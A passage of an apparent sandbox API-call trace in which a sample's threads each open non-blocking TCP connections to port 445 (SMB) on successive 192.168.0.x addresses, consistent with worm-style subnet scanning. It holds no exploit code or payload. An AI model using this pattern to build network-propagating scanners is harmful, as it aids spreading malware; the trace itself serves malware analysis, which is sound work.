protocol=6) returned 0xdc0 [0097.869] ioctlsocket (in: s=0xdc0, cmd=-2147195266, argp=0xfe0ff44 | out: argp=0xfe0ff44) returned 0 [0097.869] connect (s=0xdc0, name=0xfe0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.103"), namelen=16) returned -1 [0097.870] WSAGetLastError () returned 10035 [0097.870] select (nfds=0, readfds=0x0, writefds=0xfe0fd18, exceptfds=0xfe0fe20, timeout=0xfe0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 184 os_tid = 0xac8 [0097.870] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981250 [0097.870] free (_Block=0x3981250) [0097.871] inet_addr (cp="192.168.0.102") returned 0x6600a8c0 [0097.871] htons (hostshort=0x1bd) returned 0xbd01 [0097.871] socket (af=2, type=1, protocol=6) returned 0xdcc [0097.871] ioctlsocket (in: s=0xdcc, cmd=-2147195266, argp=0xff4ff44 | out: argp=0xff4ff44) returned 0 [0097.871] connect (s=0xdcc, name=0xff4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.102"), namelen=16) returned -1 [0097.872] WSAGetLastError () returned 10035 [0097.872] select (nfds=0, readfds=0x0, writefds=0xff4fd18, exceptfds=0xff4fe20, timeout=0xff4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 185 os_tid = 0xacc [0097.872] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981228 [0097.872] free (_Block=0x3981228) [0097.872] inet_addr (cp="192.168.0.101") returned 0x6500a8c0 [0097.872] htons (hostshort=0x1bd) returned 0xbd01 [0097.872] socket (af=2, type=1, protocol=6) returned 0xdd8 [0097.873] ioctlsocket (in: s=0xdd8, cmd=-2147195266, argp=0x1008ff44 | out: argp=0x1008ff44) returned 0 [0097.873] connect (s=0xdd8, name=0x1008ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.101"), namelen=16) returned -1 [0097.874] WSAGetLastError () returned 10035 [0097.874] select (nfds=0, readfds=0x0, writefds=0x1008fd18, exceptfds=0x1008fe20, timeout=0x1008ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 186 os_tid = 0xad0 [0097.875] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981200 [0097.875] free (_Block=0x3981200) [0097.875] inet_addr (cp="192.168.0.100") returned 0x6400a8c0 [0097.875] htons (hostshort=0x1bd) returned 0xbd01 [0097.875] socket (af=2, type=1, protocol=6) returned 0xde4 [0097.876] ioctlsocket (in: s=0xde4, cmd=-2147195266, argp=0x101cff44 | out: argp=0x101cff44) returned 0 [0097.876] connect (s=0xde4, name=0x101cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.100"), namelen=16) returned -1 [0097.876] WSAGetLastError () returned 10035 [0097.876] select (nfds=0, readfds=0x0, writefds=0x101cfd18, exceptfds=0x101cfe20, timeout=0x101cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 187 os_tid = 0xad4 [0097.877] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39811d8 [0097.877] free (_Block=0x39811d8) [0097.877] inet_addr (cp="192.168.0.99") returned 0x6300a8c0 [0097.877] htons (hostshort=0x1bd) returned 0xbd01 [0097.877] socket (af=2, type=1, protocol=6) returned 0xdf0 [0097.879] ioctlsocket (in: s=0xdf0, cmd=-2147195266, argp=0x1030ff44 | out: argp=0x1030ff44) returned 0 [0097.879] connect (s=0xdf0, name=0x1030ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.99"), namelen=16) returned -1 [0097.880] WSAGetLastError () returned 10035 [0097.880] select (nfds=0, readfds=0x0, writefds=0x1030fd18, exceptfds=0x1030fe20, timeout=0x1030ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 188 os_tid = 0xad8 [0097.881] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39811b0 [0097.881] free (_Block=0x39811b0) [0097.881] inet_addr (cp="192.168.0.98") returned 0x6200a8c0 [0097.881] htons (hostshort=0x1bd) returned 0xbd01 [0097.881] socket (af=2, type=1, protocol=6) returned 0xdfc [0097.882] ioctlsocket (in: s=0xdfc, cmd=-2147195266, argp=0x1044ff44 | out: argp=0x1044ff44) returned 0 [0097.882] connect (s=0xdfc, name=0x1044ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.98"), namelen=16) returned -1 [0097.882] WSAGetLastError () returned 10035 [0097.883] select (nfds=0, readfds=0x0, writefds=0x1044fd18, exceptfds=0x1044fe20, timeout=0x1044ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 189 os_tid = 0xadc [0097.883] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981188 [0097.883] free (_Block=0x3981188) [0097.883] inet_addr (cp="192.168.0.97") returned 0x6100a8c0 [0097.883] htons (hostshort=0x1bd) returned 0xbd01 [0097.883] socket (af=2, type=1, protocol=6) returned 0xe08 [0097.883] ioctlsocket (in: s=0xe08, cmd=-2147195266, argp=0x1058ff44 | out: argp=0x1058ff44) returned 0 [0097.884] connect (s=0xe08, name=0x1058ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.97"), namelen=16) returned -1 [0097.884] WSAGetLastError () returned 10035 [0097.884] select (nfds=0, readfds=0x0, writefds=0x1058fd18, exceptfds=0x1058fe20, timeout=0x1058ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 190 os_tid = 0xae0 [0097.885] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981160 [0097.885] free (_Block=0x3981160) [0097.885] inet_addr (cp="192.168.0.96") returned 0x6000a8c0 [0097.885] htons (hostshort=0x1bd) returned 0xbd01 [0097.885] socket (af=2, type=1, protocol=6) returned 0xe14 [0097.886] ioctlsocket (in: s=0xe14, cmd=-2147195266, argp=0x106cff44 | out: argp=0x106cff44) returned 0 [0097.886] connect (s=0xe14, name=0x106cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.96"), namelen=16) returned -1 [0097.887] WSAGetLastError () returned 10035 [0097.887] select (nfds=0, readfds=0x0, writefds=0x106cfd18, exceptfds=0x106cfe20, timeout=0x106cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 191 os_tid = 0xae4 [0097.887] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981138 [0097.887] free (_Block=0x3981138) [0097.887] inet_addr (cp="192.168.0.95") returned 0x5f00a8c0 [0097.887] htons (hostshort=0x1bd) returned 0xbd01 [0097.887] socket (af=2, type=1, protocol=6) returned 0xe20 [0097.888] ioctlsocket (in: s=0xe20, cmd=-2147195266, argp=0x1080ff44 | out: argp=0x1080ff44) returned 0 [0097.888] connect (s=0xe20, name=0x1080ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.95"), namelen=16) returned -1 [0097.888] WSAGetLastError () returned 10035 [0097.888] select (nfds=0, readfds=0x0, writefds=0x1080fd18, exceptfds=0x1080fe20, timeout=0x1080ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 192 os_tid = 0xae8 [0097.889] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981110 [0097.889] free (_Block=0x3981110) [0097.889] inet_addr (cp="192.168.0.94") returned 0x5e00a8c0 [0097.889] htons (hostshort=0x1bd) returned 0xbd01 [0097.889] socket (af=2, type=1, protocol=6) returned 0xe2c [0097.889] ioctlsocket (in: s=0xe2c, cmd=-2147195266, argp=0x1094ff44 | out: argp=0x1094ff44) returned 0 [0097.889] connect (s=0xe2c, name=0x1094ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.94"), namelen=16) returned -1 [0097.890] WSAGetLastError () returned 10035 [0097.890] select (nfds=0, readfds=0x0, writefds=0x1094fd18, exceptfds=0x1094fe20, timeout=0x1094ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 193 os_tid = 0xaec [0097.890] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39810e8 [0097.891] free (_Block=0x39810e8) [0097.891] inet_addr (cp="192.168.0.93") returned 0x5d00a8c0 [0097.891] htons (hostshort=0x1bd) returned 0xbd01 [0097.891] socket (af=2, type=1, protocol=6) returned 0xe38 [0097.891] ioctlsocket (in: s=0xe38, cmd=-2147195266, argp=0x10a8ff44 | out: argp=0x10a8ff44) returned 0 [0097.891] connect (s=0xe38, name=0x10a8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.93"), namelen=16) returned -1 [0097.892] WSAGetLastError () returned 10035 [0097.892] select (nfds=0, readfds=0x0, writefds=0x10a8fd18, exceptfds=0x10a8fe20, timeout=0x10a8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 194 os_tid = 0xaf0 [0097.894] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39810c0 [0097.894] free (_Block=0x39810c0) [0097.894] inet_addr (cp="192.168.0.92") returned 0x5c00a8c0 [0097.894] htons (hostshort=0x1bd) returned 0xbd01 [0097.894] socket (af=2, type=1, protocol=6) returned 0xe44 [0097.894] ioctlsocket (in: s=0xe44, cmd=-2147195266, argp=0x10bcff44 | out: argp=0x10bcff44) returned 0 [0097.894] connect (s=0xe44, name=0x10bcff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.92"), namelen=16) returned -1 [0097.895] WSAGetLastError () returned 10035 [0097.895] select (nfds=0, readfds=0x0, writefds=0x10bcfd18, exceptfds=0x10bcfe20, timeout=0x10bcff3c*(tv_sec=10, tv_usec=0)) Thread: id = 195 os_tid = 0xaf4 [0097.895] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981098 [0097.895] free (_Block=0x3981098) [0097.895] inet_addr (cp="192.168.0.91") returned 0x5b00a8c0 [0097.895] htons (hostshort=0x1bd) returned 0xbd01 [0097.895] socket (af=2, type=1, protocol=6) returned 0xe50 [0097.896] ioctlsocket (in: s=0xe50, cmd=-2147195266, argp=0x10d0ff44 | out: argp=0x10d0ff44) returned 0 [0097.896] connect (s=0xe50, name=0x10d0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.91"), namelen=16) returned -1 [0097.897] WSAGetLastError () returned 10035 [0097.897] select (nfds=0, readfds=0x0, writefds=0x10d0fd18, exceptfds=0x10d0fe20, timeout=0x10d0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 196 os_tid = 0xaf8 [0097.898] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981070 [0097.898] free (_Block=0x3981070) [0097.898] inet_addr (cp="192.168.0.90") returned 0x5a00a8c0 [0097.898] htons (hostshort=0x1bd) returned 0xbd01 [0097.898] socket (af=2, type=1, protocol=6) returned 0xe5c [0097.898] ioctlsocket (in: s=0xe5c, cmd=-2147195266, argp=0x10e4ff44 | out: argp=0x10e4ff44) returned 0 [0097.898] connect (s=0xe5c, name=0x10e4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.90"), namelen=16) returned -1 [0097.899] WSAGetLastError () returned 10035 [0097.899] select (nfds=0, readfds=0x0, writefds=0x10e4fd18, exceptfds=0x10e4fe20, timeout=0x10e4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 197 os_tid = 0xafc [0097.899] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981048 [0097.899] free (_Block=0x3981048) [0097.900] inet_addr (cp="192.168.0.89") returned 0x5900a8c0 [0097.900] htons (hostshort=0x1bd) returned 0xbd01 [0097.900] socket (af=2, type=1, protocol=6) returned 0xe68 [0097.900] ioctlsocket (in: s=0xe68, cmd=-2147195266, argp=0x10f8ff44 | out: argp=0x10f8ff44) returned 0 [0097.900] connect (s=0xe68, name=0x10f8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.89"), namelen=16) returned -1 [0097.901] WSAGetLastError () returned 10035 [0097.901] select (nfds=0, readfds=0x0, writefds=0x10f8fd18, exceptfds=0x10f8fe20, timeout=0x10f8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 198 os_tid = 0xb00 [0097.901] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981020 [0097.901] free (_Block=0x3981020) [0097.901] inet_addr (cp="192.168.0.88") returned 0x5800a8c0 [0097.901] htons (hostshort=0x1bd) returned 0xbd01 [0097.901] socket (af=2, type=1, protocol=6) returned 0xe74 [0097.901] ioctlsocket (in: s=0xe74, cmd=-2147195266, argp=0x110cff44 | out: argp=0x110cff44) returned 0 [0097.901] connect (s=0xe74, name=0x110cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.88"), namelen=16) returned -1 [0097.902] WSAGetLastError () returned 10035 [0097.902] select (nfds=0, readfds=0x0, writefds=0x110cfd18, exceptfds=0x110cfe20, timeout=0x110cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 199 os_tid = 0xb04 [0097.903] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980ff8 [0097.903] free (_Block=0x3980ff8) [0097.903] inet_addr (cp="192.168.0.87") returned 0x5700a8c0 [0097.903] htons (hostshort=0x1bd) returned 0xbd01 [0097.903] socket (af=2, type=1, protocol=6) returned 0xe80 [0097.903] ioctlsocket (in: s=0xe80, cmd=-2147195266, argp=0x1120ff44 | out: argp=0x1120ff44) returned 0 [0097.903] connect (s=0xe80, name=0x1120ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.87"), namelen=16) returned -1 [0097.904] WSAGetLastError () returned 10035 [0097.904] select (nfds=0, readfds=0x0, writefds=0x1120fd18, exceptfds=0x1120fe20, timeout=0x1120ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 200 os_tid = 0xb08 [0097.904] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980fd0 [0097.904] free (_Block=0x3980fd0) [0097.904] inet_addr (cp="192.168.0.86") returned 0x5600a8c0 [0097.904] htons (hostshort=0x1bd) returned 0xbd01 [0097.904] socket (af=2, type=1, protocol=6) returned 0xe8c [0097.905] ioctlsocket (in: s=0xe8c, cmd=-2147195266, argp=0x1134ff44 | out: argp=0x1134ff44) returned 0 [0097.905] connect (s=0xe8c, name=0x1134ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.86"), namelen=16) returned -1 [0097.906] WSAGetLastError () returned 10035 [0097.906] select (nfds=0, readfds=0x0, writefds=0x1134fd18, exceptfds=0x1134fe20, timeout=0x1134ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 201 os_tid = 0xb0c [0098.047] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980fa8 [0098.047] free (_Block=0x3980fa8) [0098.048] inet_addr (cp="192.168.0.85") returned 0x5500a8c0 [0098.048] htons (hostshort=0x1bd) returned 0xbd01 [0098.048] socket (af=2, type=1, protocol=6) returned 0xf28 [0098.048] ioctlsocket (in: s=0xf28, cmd=-2147195266, argp=0x1148ff44 | out: argp=0x1148ff44) returned 0 [0098.048] connect (s=0xf28, name=0x1148ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.85"), namelen=16) returned -1 [0098.049] WSAGetLastError () returned 10035 [0098.049] select (nfds=0, readfds=0x0, writefds=0x1148fd18, exceptfds=0x1148fe20, timeout=0x1148ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 202 os_tid = 0xb10 [0098.050] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980f80 [0098.050] free (_Block=0x3980f80) [0098.050] inet_addr (cp="192.168.0.84") returned 0x5400a8c0 [0098.050] htons (hostshort=0x1bd) returned 0xbd01 [0098.050] socket (af=2, type=1, protocol=6) returned 0xf34 [0098.050] ioctlsocket (in: s=0xf34, cmd=-2147195266, argp=0x115cff44 | out: argp=0x115cff44) returned 0 [0098.050] connect (s=0xf34, name=0x115cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.84"), namelen=16) returned -1 [0098.051] WSAGetLastError () returned 10035 [0098.051] select (nfds=0, readfds=0x0, writefds=0x115cfd18, exceptfds=0x115cfe20, timeout=0x115cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 203 os_tid = 0xb14 [0098.051] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980f58 [0098.051] free (_Block=0x3980f58) [0098.051] inet_addr (cp="192.168.0.83") returned 0x5300a8c0 [0098.051] htons (hostshort=0x1bd) returned 0xbd01 [0098.051] socket (af=2, type=1, protocol=6) returned 0xf40 [0098.052] ioctlsocket (in: s=0xf40, cmd=-2147195266, argp=0x1170ff44 | out: argp=0x1170ff44) returned 0 [0098.052] connect (s=0xf40, name=0x1170ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.83"), namelen=16) returned -1 [0098.052] WSAGetLastError () returned 10035 [0098.052] select (nfds=0, readfds=0x0, writefds=0x1170fd18, exceptfds=0x1170fe20, timeout=0x1170ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 204 os_tid = 0xb18 [0098.053] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980f30 [0098.053] free (_Block=0x3980f30) [0098.053] inet_addr (cp="192.168.0.82") returned 0x5200a8c0 [0098.053] htons (hostshort=0x1bd) returned 0xbd01 [0098.053] socket (af=2, type=1, protocol=6) returned 0xf4c [0098.053] ioctlsocket (in: s=0xf4c, cmd=-2147195266, argp=0x1184ff44 | out: argp=0x1184ff44) returned 0 [0098.053] connect (s=0xf4c, name=0x1184ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.82"), namelen=16) returned -1 [0098.054] WSAGetLastError () returned 10035 [0098.054] select (nfds=0, readfds=0x0, writefds=0x1184fd18, exceptfds=0x1184fe20, timeout=0x1184ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 205 os_tid = 0xb1c [0098.054] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980f08 [0098.054] free (_Block=0x3980f08) [0098.054] inet_addr (cp="192.168.0.81") returned 0x5100a8c0 [0098.055] htons (hostshort=0x1bd) returned 0xbd01 [0098.055] socket (af=2, type=1, protocol=6) returned 0xf58 [0098.057] ioctlsocket (in: s=0xf58, cmd=-2147195266, argp=0x1198ff44 | out: argp=0x1198ff44) returned 0 [0098.057] connect (s=0xf58, name=0x1198ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.81"), namelen=16) returned -1 [0098.057] WSAGetLastError () returned 10035 [0098.057] select (nfds=0, readfds=0x0, writefds=0x1198fd18, exceptfds=0x1198fe20, timeout=0x1198ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 206 os_tid = 0xb20 [0098.058] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980ee0 [0098.058] free (_Block=0x3980ee0) [0098.058] inet_addr (cp="192.168.0.80") returned 0x5000a8c0 [0098.058] htons (hostshort=0x1bd) returned 0xbd01 [0098.058] socket (af=2, type=1, protocol=6) returned 0xf64 [0098.058] ioctlsocket (in: s=0xf64, cmd=-2147195266, argp=0x11acff44 | out: argp=0x11acff44) returned 0 [0098.059] connect (s=0xf64, name=0x11acff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.80"), namelen=16) returned -1 [0098.060] WSAGetLastError () returned 10035 [0098.060] select (nfds=0, readfds=0x0, writefds=0x11acfd18, exceptfds=0x11acfe20, timeout=0x11acff3c*(tv_sec=10, tv_usec=0)) Thread: id = 207 os_tid = 0xbf8 [0098.060] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980eb8 [0098.060] free (_Block=0x3980eb8) [0098.060] inet_addr (cp="192.168.0.79") returned 0x4f00a8c0 [0098.060] htons (hostshort=0x1bd) returned 0xbd01 [0098.060] socket (af=2, type=1, protocol=6) returned 0xf70 [0098.061] ioctlsocket (in: s=0xf70, cmd=-2147195266, argp=0x11c0ff44 | out: argp=0x11c0ff44) returned 0 [0098.061] connect (s=0xf70, name=0x11c0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.79"), namelen=16) returned -1 [0098.062] WSAGetLastError () returned 10035 [0098.062] select (nfds=0, readfds=0x0, writefds=0x11c0fd18, exceptfds=0x11c0fe20, timeout=0x11c0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 208 os_tid = 0x8c4 [0098.062] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980e90 [0098.062] free (_Block=0x3980e90) [0098.062] inet_addr (cp="192.168.0.78") returned 0x4e00a8c0 [0098.062] htons (hostshort=0x1bd) returned 0xbd01 [0098.062] socket (af=2, type=1, protocol=6) returned 0xf7c [0098.064] ioctlsocket (in: s=0xf7c, cmd=-2147195266, argp=0x11d4ff44 | out: argp=0x11d4ff44) returned 0 [0098.064] connect (s=0xf7c, name=0x11d4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.78"), namelen=16) returned -1 [0098.065] WSAGetLastError () returned 10035 [0098.065] select (nfds=0, readfds=0x0, writefds=0x11d4fd18, exceptfds=0x11d4fe20, timeout=0x11d4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 209 os_tid = 0xcf8 [0098.065] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980e68 [0098.065] free (_Block=0x3980e68) [0098.066] inet_addr (cp="192.168.0.77") returned 0x4d00a8c0 [0098.066] htons (hostshort=0x1bd) returned 0xbd01 [0098.066] socket (af=2, type=1, protocol=6) returned 0xf88 [0098.066] ioctlsocket (in: s=0xf88, cmd=-2147195266, argp=0x11e8ff44 | out: argp=0x11e8ff44) returned 0 [0098.066] connect (s=0xf88, name=0x11e8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.77"), namelen=16) returned -1 [0098.067] WSAGetLastError () returned 10035 [0098.067] select (nfds=0, readfds=0x0, writefds=0x11e8fd18, exceptfds=0x11e8fe20, timeout=0x11e8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 210 os_tid = 0xd34 [0098.067] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980e40 [0098.067] free (_Block=0x3980e40) [0098.067] inet_addr (cp="192.168.0.76") returned 0x4c00a8c0 [0098.067] htons (hostshort=0x1bd) returned 0xbd01 [0098.067] socket (af=2, type=1, protocol=6) returned 0xf94 [0098.067] ioctlsocket (in: s=0xf94, cmd=-2147195266, argp=0x11fcff44 | out: argp=0x11fcff44) returned 0 [0098.068] connect (s=0xf94, name=0x11fcff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.76"), namelen=16) returned -1 [0098.068] WSAGetLastError () returned 10035 [0098.068] select (nfds=0, readfds=0x0, writefds=0x11fcfd18, exceptfds=0x11fcfe20, timeout=0x11fcff3c*(tv_sec=10, tv_usec=0)) Thread: id = 211 os_tid = 0x744 [0098.069] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980e18 [0098.069] free (_Block=0x3980e18) [0098.069] inet_addr (cp="192.168.0.75") returned 0x4b00a8c0 [0098.069] htons (hostshort=0x1bd) returned 0xbd01 [0098.069] socket (af=2, type=1, protocol=6) returned 0xfa0 [0098.070] ioctlsocket (in: s=0xfa0, cmd=-2147195266, argp=0x1210ff44 | out: argp=0x1210ff44) returned 0 [0098.070] connect (s=0xfa0, name=0x1210ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.75"), namelen=16) returned -1 [0098.070] WSAGetLastError () returned 10035 [0098.070] select (nfds=0, readfds=0x0, writefds=0x1210fd18, exceptfds=0x1210fe20, timeout=0x1210ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 212 os_tid = 0x750 [0098.071] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980df0 [0098.071] free (_Block=0x3980df0) [0098.071] inet_addr (cp="192.168.0.74") returned 0x4a00a8c0 [0098.071] htons (hostshort=0x1bd) returned 0xbd01 [0098.071] socket (af=2, type=1, protocol=6) returned 0xfac [0098.071] ioctlsocket (in: s=0xfac, cmd=-2147195266, argp=0x1224ff44 | out: argp=0x1224ff44) returned 0 [0098.071] connect (s=0xfac, name=0x1224ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.74"), namelen=16) returned -1 [0098.072] WSAGetLastError () returned 10035 [0098.072] select (nfds=0, readfds=0x0, writefds=0x1224fd18, exceptfds=0x1224fe20, timeout=0x1224ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 213 os_tid = 0x430 [0098.072] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980dc8 [0098.072] free (_Block=0x3980dc8) [0098.072] inet_addr (cp="192.168.0.73") returned 0x4900a8c0 [0098.073] htons (hostshort=0x1bd) returned 0xbd01 [0098.073] socket (af=2, type=1, protocol=6) returned 0xfb8 [0098.073] ioctlsocket (in: s=0xfb8, cmd=-2147195266, argp=0x1238ff44 | out: argp=0x1238ff44) returned 0 [0098.073] connect (s=0xfb8, name=0x1238ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.73"), namelen=16) returned -1 [0098.073] WSAGetLastError () returned 10035 [0098.074] select (nfds=0, readfds=0x0, writefds=0x1238fd18, exceptfds=0x1238fe20, timeout=0x1238ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 214 os_tid = 0x20c [0098.076] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980da0 [0098.076] free (_Block=0x3980da0) [0098.076] inet_addr (cp="192.168.0.72") returned 0x4800a8c0 [0098.076] htons (hostshort=0x1bd) returned 0xbd01 [0098.076] socket (af=2, type=1, protocol=6) returned 0xfc4 [0098.077] ioctlsocket (in: s=0xfc4, cmd=-2147195266, argp=0x124cff44 | out: argp=0x124cff44) returned 0 [0098.077] connect (s=0xfc4, name=0x124cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.72"), namelen=16) returned -1 [0098.077] WSAGetLastError () returned 10035 [0098.077] select (nfds=0, readfds=0x0, writefds=0x124cfd18, exceptfds=0x124cfe20, timeout=0x124cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 215 os_tid = 0xe9c [0098.078] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980d78 [0098.078] free (_Block=0x3980d78) [0098.078] inet_addr (cp="192.168.0.71") returned 0x4700a8c0 [0098.078] htons (hostshort=0x1bd) returned 0xbd01 [0098.078] socket (af=2, type=1, protocol=6) returned 0xfd0 [0098.078] ioctlsocket (in: s=0xfd0, cmd=-2147195266, argp=0x1260ff44 | out: argp=0x1260ff44) returned 0 [0098.078] connect (s=0xfd0, name=0x1260ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.71"), namelen=16) returned -1 [0098.079] WSAGetLastError () returned 10035 [0098.079] select (nfds=0, readfds=0x0, writefds=0x1260fd18, exceptfds=0x1260fe20, timeout=0x1260ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 216 os_tid = 0xef0 [0098.079] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980d50 [0098.079] free (_Block=0x3980d50) [0098.079] inet_addr (cp="192.168.0.70") returned 0x4600a8c0 [0098.079] htons (hostshort=0x1bd) returned 0xbd01 [0098.079] socket (af=2, type=1, protocol=6) returned 0xfdc [0098.080] ioctlsocket (in: s=0xfdc, cmd=-2147195266, argp=0x1274ff44 | out: argp=0x1274ff44) returned 0 [0098.080] connect (s=0xfdc, name=0x1274ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.70"), namelen=16) returned -1 [0098.080] WSAGetLastError () returned 10035 [0098.080] select (nfds=0, readfds=0x0, writefds=0x1274fd18, exceptfds=0x1274fe20, timeout=0x1274ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 217 os_tid = 0xef4 [0098.081] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3980d28 [0098.081] free (_Block=0x3980d28) [0098.081] inet_addr (cp="192.168.0.69") returned 0x4500a8c0 [0098.081] htons (hostshort=0x1bd) returned 0xbd01 [0098.081] socket (af=2, type=1, protocol=6) returned 0xfe8 [0098.081] ioctlsocket (in: s=0xfe8, cmd=-2147195266, argp=0x1288ff44 | out: argp=0x1288ff44) returned 0 [0098.082] connect (s=0xfe8, name=0x1288ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.69"), namelen=16) returned -1 [0098.082] WSAGetLastError () returned 10035 [0098.083] select (nfds=0, readfds=0x0, writefds=0x1288fd18, exceptfds=0x1288fe20, timeout=0x1288ff3c*(tv_sec=10, 